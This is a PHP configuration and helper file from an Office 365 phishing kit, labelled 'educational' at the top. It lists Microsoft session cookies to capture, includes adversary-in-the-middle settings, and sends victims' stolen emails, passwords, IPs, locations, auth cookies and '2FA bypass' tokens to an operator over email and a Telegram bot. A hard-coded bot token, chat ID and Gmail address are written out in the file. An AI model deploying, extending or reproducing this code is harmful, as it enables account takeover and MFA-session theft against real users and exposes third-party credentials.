<?php
// ===================================================
// EDUCATIONAL PURPOSE ONLY - SECURITY TESTING
// ===================================================

// Configuration settings
$config = [
    // Directory settings
    'data_dir' => 'data',
    'cookies_dir' => 'data/cookies',
    'sessions_dir' => 'data/sessions',
    
    // Notification settings
    'admin_email' => 'kenzinakama@gmail.com', // Change to your email
    'telegram_bot_token' => '8038789122:AAE9TF8kSNn0U4m8bVp1E3NSALATqjLFREw', // Your Telegram bot token
    'telegram_chat_id' => '5429785500', // Your Telegram chat ID
    
    // Redirect URL after submission
    'redirect_url' => 'https://login.microsoftonline.com',
    
    // Admin panel settings
    'admin_username' => 'admin',
    'admin_password' => 'admin123', // Change this to a secure password
    
    // Session timeout (in seconds)
    'session_timeout' => 3600,
    
    // Critical Office 365 authentication cookies to capture
    'auth_cookies' => [
        'ESTSAUTH',           // Primary auth cookie
        'ESTSAUTHPERSISTENT', // Persistent auth cookie (preferred)
        'ESTSAUTHLIGHT',      // Light auth cookie
        'FedAuth',            // Federation authentication
        'rtFA',               // Root federation auth
        'brcap',              // Session capability
        'CCState',            // Client state
        'SignInStateCookie',  // Sign-in state
        'STSINFRA',           // Infrastructure cookie
        'x-ms-gateway-slice'  // Gateway routing
    ],
    
    // AiTM (Adversary-in-the-Middle) settings
    'aitm_enabled' => false,  // Set to true to enable AiTM proxy
    'target_host' => 'login.microsoftonline.com'
];

// Create required directories if they don't exist
foreach (['data_dir', 'cookies_dir', 'sessions_dir'] as $dir) {
    if (!file_exists($config[$dir])) {
        mkdir($config[$dir], 0777, true);
    }
}

// Function to get client IP address
function getClientIP() {
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
        return $_SERVER['HTTP_CLIENT_IP'];
    } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        return $_SERVER['HTTP_X_FORWARDED_FOR'];
    } else {
        return $_SERVER['REMOTE_ADDR'];
    }
}

// Function to get client location from IP
function getClientLocation($ip) {
    try {
        $response = @file_get_contents("http://ip-api.com/json/{$ip}");
        if ($response) {
            $data = json_decode($response, true);
            if ($data && $data['status'] === 'success') {
                return [
                    'country' => $data['country'] ?? 'Unknown',
                    'city' => $data['city'] ?? 'Unknown',
                    'isp' => $data['isp'] ?? 'Unknown',
                    'timezone' => $data['timezone'] ?? 'Unknown'
                ];
            }
        }
    } catch (Exception $e) {
        // Silently fail
    }
    
    return ['country' => 'Unknown', 'city' => 'Unknown'];
}

// Function to log data
function logData($type, $data) {
    global $config;
    
    $log_file = $config['data_dir'] . '/log_' . date('Y-m-d') . '.txt';
    $log_entry = date('Y-m-d H:i:s') . " [{$type}] " . json_encode($data) . "\n";
    
    file_put_contents($log_file, $log_entry, FILE_APPEND);
}

// Function to save captured data
function saveData($data, $prefix = 'creds') {
    global $config;
    
    $email = isset($data['email']) ? strtolower($data['email']) : 'unknown';
    $email = preg_replace('/[^a-z0-9@._-]/', '', $email);
    $filename = $config['data_dir'] . '/' . $prefix . '_' . time() . '_' . md5($email . rand(1000, 9999)) . '.json';
    
    // Add timestamp
    $data['saved_timestamp'] = date('Y-m-d H:i:s');
    $data['ip_address'] = getClientIP();
    
    // Add location data if not present
    if (!isset($data['location'])) {
        $data['location'] = getClientLocation($data['ip_address']);
    }
    
    // Save to file
    file_put_contents($filename, json_encode($data, JSON_PRETTY_PRINT));
    
    // Send notification
    sendNotification($data);
    
    return $filename;
}

// Function to send notification via email and Telegram
function sendNotification($data) {
    global $config;
    
    $email = isset($data['email']) ? $data['email'] : 'unknown';
    $password = isset($data['password']) ? $data['password'] : 'unknown';
    $ip = isset($data['ip_address']) ? $data['ip_address'] : getClientIP();
    $user_agent = isset($data['user_agent']) ? $data['user_agent'] : $_SERVER['HTTP_USER_AGENT'];
    
    // Prepare message
    $message = "🔐 **New Office365 Credentials Captured**\n\n";
    $message .= "📧 **Email:** `$email`\n";
    $message .= "🔑 **Password:** `$password`\n";
    $message .= "🌐 **IP:** `$ip`\n";
    
    // Add location info if available
    if (isset($data['location'])) {
        $location = $data['location'];
        $message .= "📍 **Location:** {$location['city']}, {$location['country']}\n";
    }
    
    $message .= "🖥️ **User-Agent:** `" . substr($user_agent, 0, 100) . "`\n\n";
    
    // Add Office 365 cookie information
    if (isset($data['office365_auth_cookies']) && !empty($data['office365_auth_cookies'])) {
        $message .= "🍪 **Office 365 Auth Cookies Found:**\n";
        foreach ($data['office365_auth_cookies'] as $cookie_name => $cookie_value) {
            $message .= "  • `$cookie_name`: " . substr($cookie_value, 0, 20) . "...\n";
        }
        $message .= "\n";
    }
    
    // Add 2FA bypass information
    if (isset($data['2fa_bypass'])) {
        $message .= "🔓 **2FA Bypass Token Generated:**\n";
        $message .= "  • Token: `" . $data['2fa_bypass']['token'] . "`\n";
        $message .= "  • Session: `" . $data['2fa_bypass']['session_id'] . "`\n";
        $message .= "  • Expires: " . date('Y-m-d H:i:s', $data['2fa_bypass']['expires']) . "\n";
    }
    
    // Send email notification
    if (!empty($config['admin_email'])) {
        $subject = "New Office365 Credentials - $email";
        $headers = "From: noreply@security-test.com\r\n";
        $headers .= "Content-Type: text/plain; charset=UTF-8\r\n";
        @mail($config['admin_email'], $subject, strip_tags($message), $headers);
    }
    
    // Send Telegram notification
    sendTelegramNotification($message);
}

// Function to send Telegram notification
function sendTelegramNotification($message) {
    global $config;
    
    if (!empty($config['telegram_bot_token']) && !empty($config['telegram_chat_id'])) {
        $telegram_api = "https://api.telegram.org/bot" . $config['telegram_bot_token'] . "/sendMessage";
        $params = [
            'chat_id' => $config['telegram_chat_id'],
            'text' => $message,
            'parse_mode' => 'Markdown'
        ];
        
        $ch = curl_init($telegram_api);
        curl_setopt($ch, CURLOPT_HEADER, false);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, ($params));
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_exec($ch);
        curl_close($ch);
    }
}

// Admin authentication function
function isAdminAuthenticated() {
    global $config;
    
    // Check if admin is logged in via session
    if (isset($_SESSION['admin_authenticated']) && $_SESSION['admin_authenticated'] === true) {
        // Check session timeout
        if (isset($_SESSION['last_activity']) && (time() - $_SESSION['last_activity'] < $config['session_timeout'])) {
            // Update last activity time
            $_SESSION['last_activity'] = time();
            return true;
        }
    }
    
    return false;
}
?>
